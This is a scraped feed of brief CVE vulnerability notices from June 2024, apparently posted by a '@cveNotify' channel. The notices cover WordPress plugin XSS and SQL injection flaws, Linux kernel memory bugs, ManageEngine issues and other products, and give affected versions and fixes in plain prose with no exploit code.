🚨 CVE-2024-34832Directory Traversal vulnerability in CubeCart v.6.5.5 and before allows an attacker to execute arbitrary code via a crafted file uploaded to the _g and node parameters.🎖@cveNotify |
|
| 2024-06-07 14:07:24 |
🚨 CVE-2019-18683An issue was discovered in drivers/media/platform/vivid in the Linux kernel through 5.3.8. It is exploitable for privilege escalation on some Linux distributions where local users have /dev/video0 access, but only if the driver happens to be loaded. There are multiple race conditions during streaming stopping in this driver (part of the V4L2 subsystem). These issues are caused by wrong mutex locking in vivid_stop_generating_vid_cap(), vivid_stop_generating_vid_out(), sdr_cap_stop_streaming(), and the corresponding kthreads. At least one of these race conditions leads to a use-after-free.🎖@cveNotify |
|
| 2024-06-07 13:37:31 |
🚨 CVE-2024-5599The FileOrganizer – Manage WordPress and Website Files plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.0.7 via the 'fileorganizer_ajax_handler' function. This makes it possible for unauthenticated attackers to extract sensitive data including backups or other sensitive information if the files have been moved to the built-in Trash folder.🎖@cveNotify |
|
| 2024-06-07 13:37:30 |
🚨 CVE-2024-5542The Master Addons – Free Widgets, Hover Effects, Toggle, Conditions, Animations for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Navigation Menu widget of the plugin's Mega Menu extension in all versions up to, and including, 2.0.6.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-07 13:37:27 |
🚨 CVE-2024-5438The Tutor LMS – eLearning and online course solution plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.7.1 via the 'attempt_delete' function due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Instructor-level access and above, to delete arbitrary quiz attempts.🎖@cveNotify |
|
| 2024-06-07 13:37:26 |
🚨 CVE-2024-36673Sourcecodester Pharmacy/Medical Store Point of Sale System 1.0 is vulnerable SQL Injection via login.php. This vulnerability stems from inadequate validation of user inputs for the email and password parameters, allowing attackers to inject malicious SQL queries.🎖@cveNotify |
|
| 2024-06-07 13:37:25 |
🚨 CVE-2024-1086A use-after-free vulnerability in the Linux kernel's netfilter: nf_tables component can be exploited to achieve local privilege escalation.The nft_verdict_init() function allows positive values as drop error within the hook verdict, and hence the nf_hook_slow() function can cause a double free vulnerability when NF_DROP is issued with a drop error which resembles NF_ACCEPT.We recommend upgrading past commit f342de4e2f33e0e39165d8639387aa6c19dff660.🎖@cveNotify |
|
| 2024-06-07 13:37:24 |
🚨 CVE-2017-3506Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle WebLogic Server accessible data as well as unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.0 Base Score 7.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N).🎖@cveNotify |
|
| 2024-06-07 12:37:39 |
🚨 CVE-2024-5734A vulnerability classified as critical has been found in itsourcecode Online Discussion Forum 1.0. Affected is an unknown function of the file /members/poster.php. The manipulation of the argument image leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-267408.🎖@cveNotify |
|
| 2024-06-07 12:37:38 |
🚨 CVE-2024-5733A vulnerability was found in itsourcecode Online Discussion Forum 1.0. It has been rated as critical. This issue affects some unknown processing of the file register_me.php. The manipulation of the argument eaddress leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-267407.🎖@cveNotify |
|
| 2024-06-07 12:37:37 |
🚨 CVE-2024-4610Use After Free vulnerability in Arm Ltd Bifrost GPU Kernel Driver, Arm Ltd Valhall GPU Kernel Driver allows a local non-privileged user to make improper GPU memory processing operations to gain access to already freed memory.This issue affects Bifrost GPU Kernel Driver: from r34p0 through r40p0; Valhall GPU Kernel Driver: from r34p0 through r40p0.🎖@cveNotify |
|
| 2024-06-07 10:37:39 |
🚨 CVE-2024-5732A vulnerability was found in Clash up to 0.20.1 on Windows. It has been declared as critical. This vulnerability affects unknown code of the component Proxy Port. The manipulation leads to improper authentication. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. It is recommended to change the configuration settings. VDB-267406 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-06-07 10:37:38 |
🚨 CVE-2024-5426The Photo Gallery by 10Web – Mobile-Friendly Image Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘svg’ parameter in all versions up to, and including, 1.8.23 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. By default, this can only be exploited by administrators, but the ability to use and configure Photo Gallery can be extended to contributors on pro versions of the plugin.🎖@cveNotify |
|
| 2024-06-07 10:37:37 |
🚨 CVE-2023-5424The WS Form LITE plugin for WordPress is vulnerable to CSV Injection in versions up to, and including, 1.9.217. This allows unauthenticated attackers to embed untrusted input into exported CSV files, which can result in code execution when these files are downloaded and opened on a local system with a vulnerable configuration.🎖@cveNotify |
|
| 2024-06-07 09:37:32 |
🚨 CVE-2024-27313Zoho ManageEngine PAM360 is vulnerable to Stored XSS vulnerability. This vulnerability is applicable only in the version 6610.🎖@cveNotify |
|
| 2024-06-07 09:37:31 |
🚨 CVE-2024-27314Zoho ManageEngine ServiceDesk Plus versions below 14730, ServiceDesk Plus MSP below 14720 and SupportCenter Plus below 14720 are vulnerable to stored XSS in the Custom Actions menu on the request details. This vulnerability can be exploited only by the SDAdmin role users.🎖@cveNotify |
|
| 2024-06-07 09:37:30 |
🚨 CVE-2024-21791Zoho ManageEngine ADAudit Plus versions below 7271 allows SQL Injection in lockout history option. Note: Non-admin users cannot exploit this vulnerability.🎖@cveNotify |
|
| 2024-06-07 09:37:27 |
🚨 CVE-2024-27312Zoho ManageEngine PAM360 version 6601 is vulnerable to authorization vulnerability which allows a low-privileged user to perform admin actions.Note: This vulnerability affects only the PAM360 6600 version. No other versions are applicable to this vulnerability.🎖@cveNotify |
|
| 2024-06-07 09:37:26 |
🚨 CVE-2024-21775Zoho ManageEngine Exchange Reporter Plus versions 5714 and below are vulnerable to the Authenticated SQL injection in report exporting feature.🎖@cveNotify |
|
| 2024-06-07 09:37:25 |
🚨 CVE-2024-0252ManageEngine ADSelfService Plus versions 6401 and below are vulnerable to the remote code execution due to the improper handling in the load balancer component. Authentication is required in order to exploit this vulnerability.🎖@cveNotify |
|
| 2024-06-07 08:37:24 |
🚨 CVE-2024-4703The One Page Express Companion plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's one_page_express_contact_form shortcode in all versions up to, and including, 1.6.37 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-07 07:37:25 |
🚨 CVE-2024-4488The Royal Elementor Addons and Templates for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘inline_list’ parameter in versions up to, and including, 1.3.976 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-07 07:37:24 |
🚨 CVE-2024-4451The Colibri Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's colibri_video_player shortcode in all versions up to, and including, 1.0.276 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-07 06:37:31 |
🚨 CVE-2024-4756The WP Backpack WordPress plugin through 2.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2024-06-07 06:37:30 |
🚨 CVE-2024-4620The ARForms - Premium WordPress Form Builder Plugin WordPress plugin before 6.6 allows unauthenticated users to modify uploaded files in such a way that PHP code can be uploaded when an upload file input is included on a form🎖@cveNotify |
|
| 2024-06-07 06:37:26 |
🚨 CVE-2024-4042The Post Grid, Form Maker, Popup Maker, WooCommerce Blocks, Post Blocks, Post Carousel – Combo Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'class' attribute of the menu-wrap-item block in all versions up to, and including, 2.2.80 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-07 06:37:25 |
🚨 CVE-2024-3288The Logo Slider WordPress plugin before 4.0.0 does not validate and escape some of its Slider Settings before outputting them back in attributes, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks🎖@cveNotify |
|
| 2024-06-07 06:37:24 |
🚨 CVE-2023-6491The Strong Testimonials plugin for WordPress is vulnerable to unauthorized modification of data due to an improper capability check on the wpmtst_save_view_sticky function in all versions up to, and including, 3.1.12. This makes it possible for authenticated attackers, with contributor access and above, to modify favorite views.🎖@cveNotify |
|
| 2024-06-07 05:37:25 |
🚨 CVE-2024-5640The Prime Slider – Addons For Elementor (Revolution of a slider, Hero Slider, Ecommerce Slider) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘id’ attribute within the Pacific widget in all versions up to, and including, 3.14.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-07 05:37:24 |
🚨 CVE-2024-4902The Tutor LMS – eLearning and online course solution plugin for WordPress is vulnerable to time-based SQL Injection via the ‘course_id’ parameter in all versions up to, and including, 2.7.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with admin access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.🎖@cveNotify |
|
| 2024-06-07 04:38:04 |
🚨 CVE-2024-4887The Qi Addons For Elementor plugin for WordPress is vulnerable to Remote File Inclusion in all versions up to, and including, 1.7.2 via the 'behavior' attributes found in the qi_addons_for_elementor_blog_list shortcode. This makes it possible for authenticated attackers, with Contributor-level access and above, to include remote files on the server, resulting in code execution. Please note that this requires an attacker to create a non-existent directory or target an instance where file_exists won't return false with a non-existent directory in the path, in order to successfully exploit.🎖@cveNotify |
|
| 2024-06-07 04:38:00 |
🚨 CVE-2024-37384Roundcube Webmail before 1.5.7 and 1.6.x before 1.6.7 allows XSS via list columns from user preferences.🎖@cveNotify |
|
| 2024-06-07 04:37:59 |
🚨 CVE-2024-36082SQL injection vulnerability in Music Store - WordPress eCommerce versions prior to 1.1.14 allows a remote authenticated attacker with an administrative privilege to execute arbitrary SQL commands. Information stored in the database may be obtained or altered by the attacker.🎖@cveNotify |
|
| 2024-06-07 04:37:58 |
🚨 CVE-2024-1988The Post Grid, Form Maker, Popup Maker, WooCommerce Blocks, Post Blocks, Post Carousel – Combo Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'tag' attribute in blocks in all versions up to, and including, 2.2.80 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-07 03:37:29 |
🚨 CVE-2024-3987The WP Mobile Menu – The Mobile-Friendly Responsive Menu plugin for WordPress is vulnerable to Stored Cross-Site Scripting via image alt text in all versions up to, and including, 2.8.4.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-07 03:37:28 |
🚨 CVE-2023-32475Dell BIOS contains a missing support for integrity check vulnerability. An attacker with physical access to the system could potentially bypass security mechanisms to run arbitrary code on the system.🎖@cveNotify |
|
| 2024-06-07 02:37:24 |
🚨 CVE-2023-6876The Clever Fox – One Click Website Importer by Nayra Themes plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'clever-fox-activate-theme' function in all versions up to, and including, 25.2.0. This makes it possible for authenticated attackers, with subscriber access and above, to modify the active theme, including to an invalid value which can take down the site.🎖@cveNotify |
|
| 2024-06-07 01:37:35 |
🚨 CVE-2022-4968netplan leaks the private key of wireguard to local users. A security fix will be released soon.🎖@cveNotify |
|
| 2024-06-06 23:37:24 |
🚨 CVE-2023-37539The Domino Catalog template is susceptible to a Stored Cross-Site Scripting (XSS) vulnerability. An attacker with the ability to edit documents in the catalog application/database created from this template can embed a cross site scripting attack. The attack would be activated by an end user clicking it.🎖@cveNotify |
|
| 2024-06-06 22:37:32 |
🚨 CVE-2024-24194robdns commit d76d2e6 was discovered to contain a NULL pointer dereference via the item->tokens component at /src/conf-parse.c.🎖@cveNotify |
|
| 2024-06-06 22:37:25 |
🚨 CVE-2024-22524dnspod-sr 0dfbd37 is vulnerable to buffer overflow.🎖@cveNotify |
|
| 2024-06-06 22:37:24 |
🚨 CVE-2023-49441dnsmasq 2.9 is vulnerable to Integer Overflow via forward_query.🎖@cveNotify |
|
| 2024-06-06 21:37:25 |
🚨 CVE-2024-32752Under certain circumstances communications between the ICU tool and an iSTAR Pro door controller is susceptible to Machine-in-the-Middle attacks which could impact door control and configuration.🎖@cveNotify |
|
| 2024-06-06 21:37:24 |
🚨 CVE-2024-22074Dynamsoft Service 1.8.1025 through 1.8.2013, 1.7.0330 through 1.7.2531, 1.6.0428 through 1.6.1112, 1.5.0625 through 1.5.3116, 1.4.0618 through 1.4.1230, and 1.0.516 through 1.3.0115 has Incorrect Access Control. This is fixed in 1.8.2014, 1.7.4212, 1.6.3212, 1.5.31212, 1.4.3212, and 1.3.3212.🎖@cveNotify |
|
| 2024-06-06 20:37:37 |
🚨 CVE-2024-4718A vulnerability was found in Campcodes Complete Web-Based School Management System 1.0. It has been classified as problematic. Affected is an unknown function of the file /model/delete_student_grade_subject.php. The manipulation of the argument index leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-263796.🎖@cveNotify |
|
| 2024-06-06 20:37:33 |
🚨 CVE-2024-3979A vulnerability, which was classified as problematic, has been found in COVESA vsomeip up to 3.4.10. Affected by this issue is some unknown functionality. The manipulation leads to race condition. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-261596.🎖@cveNotify |
|
| 2024-06-06 20:37:32 |
🚨 CVE-2024-3931A vulnerability was found in Totara LMS 18.0.1 Build 20231128.01. It has been rated as problematic. Affected by this issue is some unknown functionality of the file admin/roles/check.php of the component Profile Handler. The manipulation of the argument ID Number leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-261368. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-06-06 20:37:31 |
🚨 CVE-2024-3928A vulnerability was found in Dromara open-capacity-platform 2.0.1. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /actuator/heapdump of the component auth-server. The manipulation leads to information disclosure. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-261367.🎖@cveNotify |
|
| 2024-06-06 20:37:30 |
🚨 CVE-2023-39113ngiflib commit fb271 was discovered to contain a segmentation violation via the function "main" at gif2tag.c. This vulnerability is triggered when running the program gif2tga.🎖@cveNotify |
|
| 2024-06-06 20:37:26 |
🚨 CVE-2021-3520There's a flaw in lz4. An attacker who submits a crafted file to an application linked with lz4 may be able to trigger an integer overflow, leading to calling of memmove() on a negative size argument, causing an out-of-bounds write and/or a crash. The greatest impact of this flaw is to availability, with some potential impact to confidentiality and integrity as well.🎖@cveNotify |
|
| 2024-06-06 20:37:25 |
🚨 CVE-2019-16347ngiflib 0.4 has a heap-based buffer overflow in WritePixels() in ngiflib.c when called from DecodeGifImg, because deinterlacing for small pictures is mishandled.🎖@cveNotify |
|
| 2024-06-06 20:37:24 |
🚨 CVE-2019-16346ngiflib 0.4 has a heap-based buffer overflow in WritePixel() in ngiflib.c when called from DecodeGifImg, because deinterlacing for small pictures is mishandled.🎖@cveNotify |
|
| 2024-06-06 20:07:26 |
🚨 CVE-2023-39114ngiflib commit 84a75 was discovered to contain a segmentation violation via the function SDL_LoadAnimatedGif at ngiflibSDL.c. This vulnerability is triggered when running the program SDLaffgif.🎖@cveNotify |
|
| 2024-06-06 20:07:25 |
🚨 CVE-2014-8159The InfiniBand (IB) implementation in the Linux kernel package before 2.6.32-504.12.2 on Red Hat Enterprise Linux (RHEL) 6 does not properly restrict use of User Verbs for registration of memory regions, which allows local users to access arbitrary physical memory locations, and consequently cause a denial of service (system crash) or gain privileges, by leveraging permissions on a uverbs device under /dev/infiniband/.🎖@cveNotify |
|
| 2024-06-06 20:07:24 |
🚨 CVE-2014-3186Buffer overflow in the picolcd_raw_event function in devices/hid/hid-picolcd_core.c in the PicoLCD HID device driver in the Linux kernel through 3.16.3, as used in Android on Nexus 7 devices, allows physically proximate attackers to cause a denial of service (system crash) or possibly execute arbitrary code via a crafted device that sends a large report.🎖@cveNotify |
|
| 2024-06-06 19:07:25 |
🚨 CVE-2024-29004The SolarWinds Platform was determined to be affected by a stored cross-site scripting vulnerability affecting the web console. A high-privileged user and user interaction is required to exploit this vulnerability.🎖@cveNotify |
|
| 2024-06-06 19:07:24 |
🚨 CVE-2024-28999The SolarWinds Platform was determined to be affected by a Race Condition Vulnerability affecting the web console.🎖@cveNotify |
|
| 2024-06-06 17:37:26 |
🚨 CVE-2024-33655The DNS protocol in RFC 1035 and updates allows remote attackers to cause a denial of service (resource consumption) by arranging for DNS queries to be accumulated for seconds, such that responses are later sent in a pulsing burst (which can be considered traffic amplification in some cases), aka the "DNSBomb" issue.🎖@cveNotify |
|
| 2024-06-06 17:37:25 |
🚨 CVE-2020-36625A vulnerability was found in destiny.gg chat. It has been rated as problematic. This issue affects the function websocket.Upgrader of the file main.go. The manipulation leads to cross-site request forgery. The attack may be initiated remotely. The name of the patch is bebd256fc3063111fb4503ca25e005ebf6e73780. It is recommended to apply a patch to fix this issue. The identifier VDB-216521 was assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-06-06 17:37:24 |
🚨 CVE-2017-20013A vulnerability classified as problematic was found in WEKA INTEREST Security Scanner up to 1.8. Affected by this vulnerability is the Stresstest Configuration Handler. A manipulation leads to a local denial of service. The exploit has been disclosed to the public and may be used. NOTE: This vulnerability only affects products that are no longer supported by the maintainer🎖@cveNotify |
|
| 2024-06-06 16:37:32 |
🚨 CVE-2024-37152Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. The vulnerability allows unauthorized access to the sensitive settings exposed by /api/v1/settings endpoint without authentication. All sensitive settings are hidden except passwordPattern. This vulnerability is fixed in 2.11.3, 2.10.12, and 2.9.17.🎖@cveNotify |
|
| 2024-06-06 16:37:31 |
🚨 CVE-2024-37150An issue in `.npmrc` support in Deno 1.44.0 was discovered where Deno would send `.npmrc` credentials for the scope to the tarball URL when the registry provided URLs for a tarball on a different domain. All users relying on .npmrc are potentially affected by this vulnerability if their private registry references tarball URLs at a different domain. This includes usage of deno install subcommand, auto-install for npm: specifiers and LSP usage. It is recommended to upgrade to Deno 1.44.1 and if your private registry ever serves tarballs at a different domain to rotate your registry credentials.🎖@cveNotify |
|
| 2024-06-06 16:37:30 |
🚨 CVE-2024-36399Kanboard is project management software that focuses on the Kanban methodology. The vuln is in app/Controller/ProjectPermissionController.php function addUser(). The users permission to add users to a project only get checked on the URL parameter project_id. If the user is authorized to add users to this project the request gets processed. The users permission for the POST BODY parameter project_id does not get checked again while processing. An attacker with the 'Project Manager' on a single project may take over any other project. The vulnerability is fixed in 1.2.37.🎖@cveNotify |
|
| 2024-06-06 16:37:26 |
🚨 CVE-2024-28996The SolarWinds Platform was determined to be affected by a SWQL Injection Vulnerability. Attack complexity is high for this vulnerability.🎖@cveNotify |
|
| 2024-06-06 16:37:25 |
🚨 CVE-2022-4969A vulnerability, which was classified as critical, has been found in bwoodsend rockhopper up to 0.1.2. Affected by this issue is the function count_rows of the file rockhopper/src/ragged_array.c of the component Binary Parser. The manipulation of the argument raw leads to buffer overflow. Local access is required to approach this attack. Upgrading to version 0.2.0 is able to address this issue. The name of the patch is 1a15fad5e06ae693eb9b8908363d2c8ef455104e. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-266312.🎖@cveNotify |
|
| 2024-06-06 16:37:24 |
🚨 CVE-2024-36361Pug through 3.0.2 allows JavaScript code execution if an application accepts untrusted input for the name option of the compileClient, compileFileClient, or compileClientWithDependenciesTracked function. NOTE: these functions are for compiling Pug templates into JavaScript, and there would typically be no reason to allow untrusted callers.🎖@cveNotify |
|
| 2024-06-06 15:37:56 |
🚨 CVE-2024-34832Directory Traversal vulnerability in CubeCart v.6.5.5 and before allows an attacker to execute arbitrary code via a crafted file uploaded to the _g and node parameters.🎖@cveNotify |
|
| 2024-06-06 15:37:52 |
🚨 CVE-2024-36549idccms v1.35 was discovered to contain a Cross-Site Request Forgery (CSRF) via /admin/vpsCompany_deal.php?mudi=rev&nohrefStr=close🎖@cveNotify |
|
| 2024-06-06 15:37:51 |
🚨 CVE-2024-23692Rejetto HTTP File Server, up to and including version 2.3m, is vulnerable to a template injection vulnerability. This vulnerability allows a remote, unauthenticated attacker to execute arbitrary commands on the affected system by sending a specially crafted HTTP request. As of the CVE assignment date, Rejetto HFS 2.3m is no longer supported.🎖@cveNotify |
|
| 2024-06-06 14:07:48 |
🚨 CVE-2024-1940The Brizy – Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via post content in all versions up to, and including, 2.4.41 due to insufficient input sanitization performed only on the client side and insufficient output escaping. This makes it possible for authenticated attackers, with contributor access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-06 14:07:47 |
🚨 CVE-2024-1161The Brizy – Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Custom Attributes for blocks in all versions up to, and including, 2.4.43 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-06 13:38:24 |
🚨 CVE-2024-5684An attacker with access to the private network (the charger is connected to) or local access to the Ethernet-Interface can exploit a faulty implementation of the JWT-library in order to bypass the password authentication to the web configuration interface and then has full access as the user would have. However, an attacker will not have developer or admin rights. If the implementation of the JWT-library is wrongly configured to accept "none"-algorithms, the server will pass insecure JWT. A local, unauthenticated attacker can exploit this vulnerability to bypass the authentication mechanism.🎖@cveNotify |
|
| 2024-06-06 13:38:23 |
🚨 CVE-2024-36779Sourcecodester Stock Management System v1.0 is vulnerable to SQL Injection via editCategories.php.🎖@cveNotify |
|
| 2024-06-06 13:38:19 |
🚨 CVE-2024-35653Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in visualcomposer.Com Visual Composer Website Builder allows Stored XSS.This issue affects Visual Composer Website Builder: from n/a through 45.8.0.🎖@cveNotify |
|
| 2024-06-06 13:38:18 |
🚨 CVE-2024-35651Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Spiffy Plugins WP Flow Plus allows Stored XSS.This issue affects WP Flow Plus: from n/a through 5.2.2.🎖@cveNotify |
|
| 2024-06-06 13:38:17 |
🚨 CVE-2024-21512Versions of the package mysql2 before 3.9.8 are vulnerable to Prototype Pollution due to improper user input sanitization passed to fields and tables when using nestTables.🎖@cveNotify |
|
| 2024-06-06 12:37:24 |
🚨 CVE-2024-5489The Wbcom Designs – Custom Font Uploader plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'cfu_delete_customfont' function in all versions up to, and including, 2.3.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete any custom font.🎖@cveNotify |
|
| 2024-06-06 11:37:30 |
🚨 CVE-2024-5658The CraftCMS plugin Two-Factor Authentication through 3.3.3 allows reuse of TOTP tokens multiple times within the validity period.🎖@cveNotify |
|
| 2024-06-06 11:37:26 |
🚨 CVE-2024-5657The CraftCMS plugin Two-Factor Authentication in versions 3.3.1, 3.3.2 and 3.3.3 discloses the password hash of the currently authenticated user after submitting a valid TOTP.🎖@cveNotify |
|
| 2024-06-06 11:37:25 |
🚨 CVE-2024-3049A flaw was found in Booth, a cluster ticket manager. If a specially-crafted hash is passed to gcry_md_get_algo_dlen(), it may allow an invalid HMAC to be accepted by the Booth server.🎖@cveNotify |
|
| 2024-06-06 11:37:24 |
🚨 CVE-2024-2947A flaw was found in Cockpit. Deleting a sosreport with a crafted name via the Cockpit web interface can lead to a command injection vulnerability, resulting in privilege escalation. This issue affects Cockpit versions 270 and newer.🎖@cveNotify |
|
| 2024-06-06 10:37:37 |
🚨 CVE-2024-5259The MultiVendorX Marketplace – WooCommerce MultiVendor Marketplace Solution plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘hover_animation’ parameter in all versions up to, and including, 4.1.11 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-06 08:38:03 |
🚨 CVE-2024-5665The Login/Signup Popup ( Inline Form + Woocommerce ) plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the ‘export_settings’ function in versions 2.7.1 to 2.7.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read arbitrary options on affected sites.🎖@cveNotify |
|
| 2024-06-06 08:38:02 |
🚨 CVE-2024-4177A host whitelist parser issue in the proxy service implemented in the GravityZone Update Server allows an attacker to cause a server-side request forgery. This issue only affects GravityZone Console versions before 6.38.1-2 that are running only on premise.🎖@cveNotify |
|
| 2024-06-06 06:37:25 |
🚨 CVE-2024-3049A flaw was found in Booth, a cluster ticket manager. If a specially-crafted hash is passed to gcry_md_get_algo_dlen(), it may allow an invalid HMAC to be accepted by the Booth server.🎖@cveNotify |
|
| 2024-06-06 06:37:24 |
🚨 CVE-2023-31468An issue was discovered in Inosoft VisiWin 7 through 2022-2.1 (Runtime RT7.3 RC3 20221209.5). The "%PROGRAMFILES(X86)%\INOSOFT GmbH" folder has weak permissions for Everyone, allowing an attacker to insert a Trojan horse file that runs as SYSTEM. 2024-1 is a fixed version.🎖@cveNotify |
|
| 2024-06-06 05:37:24 |
🚨 CVE-2024-5656The Google CSE plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.0.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.🎖@cveNotify |
|
| 2024-06-06 04:38:12 |
🚨 CVE-2024-4364The Qi Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's button widgets in all versions up to, and including, 1.7.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-06 04:38:06 |
🚨 CVE-2024-4212The Themesflat Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's TF Group Image, TF Nav Menu, TF Posts, TF Woo Product Grid, TF Accordion, and TF Image Box widgets in all versions up to, and including, 2.1.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-06 04:38:05 |
🚨 CVE-2024-0972The BuddyPress Members Only plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.3.5 via the REST API. This makes it possible for unauthenticated attackers to bypass the plugin's "All Other Sections On Your Site Will be Opened to Guest" feature (when unset) and view restricted page and post content.🎖@cveNotify |
|
| 2024-06-06 04:38:04 |
🚨 CVE-2024-29976** UNSUPPORTED WHEN ASSIGNED **The improper privilege management vulnerability in the command “show_allsessions” in Zyxel NAS326 firmware versions before V5.21(AAZF.17)C0 and NAS542 firmware versions before V5.21(ABAG.14)C0 could allow an authenticated attacker to obtain a logged-in administrator’s session information containing cookies on an affected device.🎖@cveNotify |
|
| 2024-06-06 03:37:25 |
🚨 CVE-2024-2017The Countdown, Coming Soon, Maintenance – Countdown & Clock plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the conditionsRow and switchCountdown functions in all versions up to, and including, 2.7.8. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject PHP Objects and modify the status of countdowns.🎖@cveNotify |
|
| 2024-06-06 03:37:24 |
🚨 CVE-2024-20069In modem, there is a possible selection of less-secure algorithm during the VoWiFi IKE due to a missing DH downgrade check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01286330; Issue ID: MSV-1430.🎖@cveNotify |
|
| 2024-06-06 02:37:37 |
